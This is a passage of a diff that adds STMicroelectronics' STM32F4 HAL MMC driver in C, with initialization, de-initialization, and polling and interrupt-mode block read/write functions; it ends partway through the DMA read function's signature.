+ + By default, after the HAL_MMC_Init and if the state is HAL_MMC_STATE_RESET + all callbacks are reset to the corresponding legacy weak (surcharged) functions. + Exception done for MspInit and MspDeInit callbacks that are respectively + reset to the legacy weak (surcharged) functions in the HAL_MMC_Init + and HAL_MMC_DeInit only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_MMC_Init and HAL_MMC_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in READY state only. + Exception done for MspInit/MspDeInit callbacks that can be registered/unregistered + in READY or RESET state, thus registered (user) MspInit/DeInit callbacks can be used + during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_MMC_RegisterCallback before calling HAL_MMC_DeInit + or HAL_MMC_Init function. + + When The compilation define USE_HAL_MMC_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registering feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup MMC MMC + * @brief MMC HAL module driver + * @{ + */ + +#ifdef HAL_MMC_MODULE_ENABLED + +#if defined(SDIO) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup MMC_Private_Defines + * @{ + */ + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/** @defgroup MMC_Private_Functions MMC Private Functions + * @{ + */ +static uint32_t MMC_InitCard(MMC_HandleTypeDef *hmmc); +static uint32_t MMC_PowerON(MMC_HandleTypeDef *hmmc); +static uint32_t MMC_SendStatus(MMC_HandleTypeDef *hmmc, uint32_t *pCardStatus); +static uint32_t MMC_ReadExtCSD(MMC_HandleTypeDef *hmmc, uint32_t *pFieldData, uint16_t FieldIndex, uint32_t Timeout); +static void MMC_PowerOFF(MMC_HandleTypeDef *hmmc); +static void MMC_Write_IT(MMC_HandleTypeDef *hmmc); +static void MMC_Read_IT(MMC_HandleTypeDef *hmmc); +static void MMC_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void MMC_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void MMC_DMAError(DMA_HandleTypeDef *hdma); +static void MMC_DMATxAbort(DMA_HandleTypeDef *hdma); +static void MMC_DMARxAbort(DMA_HandleTypeDef *hdma); +/** + * @} + */ +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup MMC_Exported_Functions + * @{ + */ + +/** @addtogroup MMC_Exported_Functions_Group1 + * @brief Initialization and de-initialization functions + * +@verbatim + ============================================================================== + ##### Initialization and de-initialization functions ##### + ============================================================================== + [..] + This section provides functions allowing to initialize/de-initialize the MMC + card device to be ready for use. + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the MMC according to the specified parameters in the + MMC_HandleTypeDef and create the associated handle. + * @param hmmc: Pointer to the MMC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_Init(MMC_HandleTypeDef *hmmc) +{ + /* Check the MMC handle allocation */ + if(hmmc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SDIO_ALL_INSTANCE(hmmc->Instance)); + assert_param(IS_SDIO_CLOCK_EDGE(hmmc->Init.ClockEdge)); + assert_param(IS_SDIO_CLOCK_BYPASS(hmmc->Init.ClockBypass)); + assert_param(IS_SDIO_CLOCK_POWER_SAVE(hmmc->Init.ClockPowerSave)); + assert_param(IS_SDIO_BUS_WIDE(hmmc->Init.BusWide)); + assert_param(IS_SDIO_HARDWARE_FLOW_CONTROL(hmmc->Init.HardwareFlowControl)); + assert_param(IS_SDIO_CLKDIV(hmmc->Init.ClockDiv)); + + if(hmmc->State == HAL_MMC_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hmmc->Lock = HAL_UNLOCKED; +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + /* Reset Callback pointers in HAL_MMC_STATE_RESET only */ + hmmc->TxCpltCallback = HAL_MMC_TxCpltCallback; + hmmc->RxCpltCallback = HAL_MMC_RxCpltCallback; + hmmc->ErrorCallback = HAL_MMC_ErrorCallback; + hmmc->AbortCpltCallback = HAL_MMC_AbortCallback; + + if(hmmc->MspInitCallback == NULL) + { + hmmc->MspInitCallback = HAL_MMC_MspInit; + } + + /* Init the low level hardware */ + hmmc->MspInitCallback(hmmc); +#else + /* Init the low level hardware : GPIO, CLOCK, CORTEX...etc */ + HAL_MMC_MspInit(hmmc); +#endif + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize the Card parameters */ + if(HAL_MMC_InitCard(hmmc) == HAL_ERROR) + { + return HAL_ERROR; + } + + /* Initialize the error code */ + hmmc->ErrorCode = HAL_DMA_ERROR_NONE; + + /* Initialize the MMC operation */ + hmmc->Context = MMC_CONTEXT_NONE; + + /* Initialize the MMC state */ + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initializes the MMC Card. + * @param hmmc: Pointer to MMC handle + * @note This function initializes the MMC card. It could be used when a card + re-initialization is needed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_InitCard(MMC_HandleTypeDef *hmmc) +{ + uint32_t errorstate; + MMC_InitTypeDef Init; + HAL_StatusTypeDef status; + + /* Default SDIO peripheral configuration for MMC card initialization */ + Init.ClockEdge = SDIO_CLOCK_EDGE_RISING; + Init.ClockBypass = SDIO_CLOCK_BYPASS_DISABLE; + Init.ClockPowerSave = SDIO_CLOCK_POWER_SAVE_DISABLE; + Init.BusWide = SDIO_BUS_WIDE_1B; + Init.HardwareFlowControl = SDIO_HARDWARE_FLOW_CONTROL_DISABLE; + Init.ClockDiv = SDIO_INIT_CLK_DIV; + + /* Initialize SDIO peripheral interface with default configuration */ + status = SDIO_Init(hmmc->Instance, Init); + if(status == HAL_ERROR) + { + return HAL_ERROR; + } + + /* Disable SDIO Clock */ + __HAL_MMC_DISABLE(hmmc); + + /* Set Power State to ON */ + status = SDIO_PowerState_ON(hmmc->Instance); + if(status == HAL_ERROR) + { + return HAL_ERROR; + } + + /* Enable MMC Clock */ + __HAL_MMC_ENABLE(hmmc); + + /* Identify card operating voltage */ + errorstate = MMC_PowerON(hmmc); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->State = HAL_MMC_STATE_READY; + hmmc->ErrorCode |= errorstate; + return HAL_ERROR; + } + + /* Card initialization */ + errorstate = MMC_InitCard(hmmc); + if(errorstate != HAL_MMC_ERROR_NONE) + { + hmmc->State = HAL_MMC_STATE_READY; + hmmc->ErrorCode |= errorstate; + return HAL_ERROR; + } + + /* Set Block Size for Card */ + errorstate = SDMMC_CmdBlockLength(hmmc->Instance, MMC_BLOCKSIZE); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + return HAL_OK; +} + +/** + * @brief De-Initializes the MMC card. + * @param hmmc: Pointer to MMC handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_DeInit(MMC_HandleTypeDef *hmmc) +{ + /* Check the MMC handle allocation */ + if(hmmc == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_SDIO_ALL_INSTANCE(hmmc->Instance)); + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Set MMC power state to off */ + MMC_PowerOFF(hmmc); + +#if defined (USE_HAL_MMC_REGISTER_CALLBACKS) && (USE_HAL_MMC_REGISTER_CALLBACKS == 1U) + if(hmmc->MspDeInitCallback == NULL) + { + hmmc->MspDeInitCallback = HAL_MMC_MspDeInit; + } + + /* DeInit the low level hardware */ + hmmc->MspDeInitCallback(hmmc); +#else + /* De-Initialize the MSP layer */ + HAL_MMC_MspDeInit(hmmc); +#endif + + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + hmmc->State = HAL_MMC_STATE_RESET; + + return HAL_OK; +} + + +/** + * @brief Initializes the MMC MSP. + * @param hmmc: Pointer to MMC handle + * @retval None + */ +__weak void HAL_MMC_MspInit(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_MMC_MspInit could be implemented in the user file + */ +} + +/** + * @brief De-Initialize MMC MSP. + * @param hmmc: Pointer to MMC handle + * @retval None + */ +__weak void HAL_MMC_MspDeInit(MMC_HandleTypeDef *hmmc) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hmmc); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_MMC_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @addtogroup MMC_Exported_Functions_Group2 + * @brief Data transfer functions + * +@verbatim + ============================================================================== + ##### IO operation functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to manage the data + transfer from/to MMC card. + +@endverbatim + * @{ + */ + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed by polling mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @param hmmc: Pointer to MMC handle + * @param pData: pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of MMC blocks to read + * @param Timeout: Specify timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_ReadBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count, data, dataremaining; + uint32_t add = BlockAdd; + uint8_t *tempbuff = pData; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = NumberOfBlocks * MMC_BLOCKSIZE; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + /* Read block(s) in polling mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = MMC_CONTEXT_READ_MULTIPLE_BLOCK; + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = MMC_CONTEXT_READ_SINGLE_BLOCK; + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hmmc->Instance, add); + } + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Poll on SDIO flags */ + dataremaining = config.DataLength; +#if defined(SDIO_STA_STBITERR) + while(!__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND | SDIO_FLAG_STBITERR)) +#else /* SDIO_STA_STBITERR not defined */ + while(!__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXOVERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND)) +#endif /* SDIO_STA_STBITERR */ + { + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXFIFOHF) && (dataremaining > 0U)) + { + /* Read data from SDIO Rx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = SDIO_ReadFIFO(hmmc->Instance); + *tempbuff = (uint8_t)(data & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 8U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 16U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 24U) & 0xFFU); + tempbuff++; + dataremaining--; + } + } + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_TIMEOUT; + hmmc->State= HAL_MMC_STATE_READY; + return HAL_TIMEOUT; + } + } + + /* Send stop transmission command in case of multiblock read */ + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DATAEND) && (NumberOfBlocks > 1U)) + { + /* Send stop transmission command */ + errorstate = SDMMC_CmdStopTransfer(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + } + + /* Get error state */ + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DTIMEOUT)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_TIMEOUT; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DCRCFAIL)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_CRC_FAIL; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXOVERR)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_RX_OVERRUN; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else + { + /* Nothing to do */ + } + + /* Empty FIFO if there is still any data */ + while ((__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_RXDAVL)) && (dataremaining > 0U)) + { + data = SDIO_ReadFIFO(hmmc->Instance); + *tempbuff = (uint8_t)(data & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 8U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 16U) & 0xFFU); + tempbuff++; + dataremaining--; + *tempbuff = (uint8_t)((data >> 24U) & 0xFFU); + tempbuff++; + dataremaining--; + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_TIMEOUT; + hmmc->State= HAL_MMC_STATE_READY; + return HAL_ERROR; + } + } + + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; + } + else + { + hmmc->ErrorCode |= HAL_MMC_ERROR_BUSY; + return HAL_ERROR; + } +} + +/** + * @brief Allows to write block(s) to a specified address in a card. The Data + * transfer is managed by polling mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @param hmmc: Pointer to MMC handle + * @param pData: pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of MMC blocks to write + * @param Timeout: Specify timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_WriteBlocks(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks, uint32_t Timeout) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t tickstart = HAL_GetTick(); + uint32_t count, data, dataremaining; + uint32_t add = BlockAdd; + uint8_t *tempbuff = pData; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = MMC_CONTEXT_WRITE_MULTIPLE_BLOCK; + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = MMC_CONTEXT_WRITE_SINGLE_BLOCK; + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hmmc->Instance, add); + } + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = NumberOfBlocks * MMC_BLOCKSIZE; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + /* Write block(s) in polling mode */ + dataremaining = config.DataLength; +#if defined(SDIO_STA_STBITERR) + while(!__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXUNDERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND | SDIO_FLAG_STBITERR)) +#else /* SDIO_STA_STBITERR not defined */ + while(!__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXUNDERR | SDIO_FLAG_DCRCFAIL | SDIO_FLAG_DTIMEOUT | SDIO_FLAG_DATAEND)) +#endif /* SDIO_STA_STBITERR */ + { + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXFIFOHE) && (dataremaining > 0U)) + { + /* Write data to SDIO Tx FIFO */ + for(count = 0U; count < 8U; count++) + { + data = (uint32_t)(*tempbuff); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 8U); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 16U); + tempbuff++; + dataremaining--; + data |= ((uint32_t)(*tempbuff) << 24U); + tempbuff++; + dataremaining--; + (void)SDIO_WriteFIFO(hmmc->Instance, &data); + } + } + + if(((HAL_GetTick()-tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_TIMEOUT; + } + } + + /* Send stop transmission command in case of multiblock write */ + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DATAEND) && (NumberOfBlocks > 1U)) + { + /* Send stop transmission command */ + errorstate = SDMMC_CmdStopTransfer(hmmc->Instance); + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + } + + /* Get error state */ + if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DTIMEOUT)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_TIMEOUT; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_DCRCFAIL)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_DATA_CRC_FAIL; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else if(__HAL_MMC_GET_FLAG(hmmc, SDIO_FLAG_TXUNDERR)) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= HAL_MMC_ERROR_TX_UNDERRUN; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + else + { + /* Nothing to do */ + } + + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_DATA_FLAGS); + + hmmc->State = HAL_MMC_STATE_READY; + + return HAL_OK; + } + else + { + hmmc->ErrorCode |= HAL_MMC_ERROR_BUSY; + return HAL_ERROR; + } +} + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed in interrupt mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @note You could also check the IT transfer process through the MMC Rx + * interrupt event. + * @param hmmc: Pointer to MMC handle + * @param pData: Pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of blocks to read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_ReadBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + + hmmc->pRxBuffPtr = pData; + hmmc->RxXferSize = MMC_BLOCKSIZE * NumberOfBlocks; + +#if defined(SDIO_STA_STBITERR) + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_FLAG_RXFIFOHF | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_RXOVERR | SDIO_IT_DATAEND | SDIO_FLAG_RXFIFOHF)); +#endif /* SDIO_STA_STBITERR */ + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = MMC_BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_SDIO; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + /* Read Blocks in IT mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = (MMC_CONTEXT_READ_MULTIPLE_BLOCK | MMC_CONTEXT_IT); + + /* Read Multi Block command */ + errorstate = SDMMC_CmdReadMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = (MMC_CONTEXT_READ_SINGLE_BLOCK | MMC_CONTEXT_IT); + + /* Read Single Block command */ + errorstate = SDMMC_CmdReadSingleBlock(hmmc->Instance, add); + } + + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Writes block(s) to a specified address in a card. The Data transfer + * is managed in interrupt mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @note You could also check the IT transfer process through the MMC Tx + * interrupt event. + * @param hmmc: Pointer to MMC handle + * @param pData: Pointer to the buffer that will contain the data to transmit + * @param BlockAdd: Block Address where data will be written + * @param NumberOfBlocks: Number of blocks to write + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_WriteBlocks_IT(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t NumberOfBlocks) +{ + SDIO_DataInitTypeDef config; + uint32_t errorstate; + uint32_t add = BlockAdd; + + if(NULL == pData) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_PARAM; + return HAL_ERROR; + } + + if(hmmc->State == HAL_MMC_STATE_READY) + { + hmmc->ErrorCode = HAL_MMC_ERROR_NONE; + + if((BlockAdd + NumberOfBlocks) > (hmmc->MmcCard.LogBlockNbr)) + { + hmmc->ErrorCode |= HAL_MMC_ERROR_ADDR_OUT_OF_RANGE; + return HAL_ERROR; + } + + hmmc->State = HAL_MMC_STATE_BUSY; + + /* Initialize data control register */ + hmmc->Instance->DCTRL = 0U; + + hmmc->pTxBuffPtr = pData; + hmmc->TxXferSize = MMC_BLOCKSIZE * NumberOfBlocks; + + /* Enable transfer interrupts */ +#if defined(SDIO_STA_STBITERR) + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND | SDIO_FLAG_TXFIFOHE | SDIO_IT_STBITERR)); +#else /* SDIO_STA_STBITERR not defined */ + __HAL_MMC_ENABLE_IT(hmmc, (SDIO_IT_DCRCFAIL | SDIO_IT_DTIMEOUT | SDIO_IT_TXUNDERR | SDIO_IT_DATAEND | SDIO_FLAG_TXFIFOHE)); +#endif /* SDIO_STA_STBITERR */ + + if ((hmmc->MmcCard.CardType) != MMC_HIGH_CAPACITY_CARD) + { + add *= 512U; + } + + /* Write Blocks in Polling mode */ + if(NumberOfBlocks > 1U) + { + hmmc->Context = (MMC_CONTEXT_WRITE_MULTIPLE_BLOCK| MMC_CONTEXT_IT); + + /* Write Multi Block command */ + errorstate = SDMMC_CmdWriteMultiBlock(hmmc->Instance, add); + } + else + { + hmmc->Context = (MMC_CONTEXT_WRITE_SINGLE_BLOCK | MMC_CONTEXT_IT); + + /* Write Single Block command */ + errorstate = SDMMC_CmdWriteSingleBlock(hmmc->Instance, add); + } + if(errorstate != HAL_MMC_ERROR_NONE) + { + /* Clear all the static flags */ + __HAL_MMC_CLEAR_FLAG(hmmc, SDIO_STATIC_FLAGS); + hmmc->ErrorCode |= errorstate; + hmmc->State = HAL_MMC_STATE_READY; + return HAL_ERROR; + } + + /* Configure the MMC DPSM (Data Path State Machine) */ + config.DataTimeOut = SDMMC_DATATIMEOUT; + config.DataLength = MMC_BLOCKSIZE * NumberOfBlocks; + config.DataBlockSize = SDIO_DATABLOCK_SIZE_512B; + config.TransferDir = SDIO_TRANSFER_DIR_TO_CARD; + config.TransferMode = SDIO_TRANSFER_MODE_BLOCK; + config.DPSM = SDIO_DPSM_ENABLE; + (void)SDIO_ConfigData(hmmc->Instance, &config); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Reads block(s) from a specified address in a card. The Data transfer + * is managed by DMA mode. + * @note This API should be followed by a check on the card state through + * HAL_MMC_GetCardState(). + * @note You could also check the DMA transfer process through the MMC Rx + * interrupt event. + * @param hmmc: Pointer MMC handle + * @param pData: Pointer to the buffer that will contain the received data + * @param BlockAdd: Block Address from where data is to be read + * @param NumberOfBlocks: Number of blocks to read. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MMC_ReadBlocks_DMA(MMC_HandleTypeDef *hmmc, uint8_t *pData, uint32_t BlockAdd, uint32_t 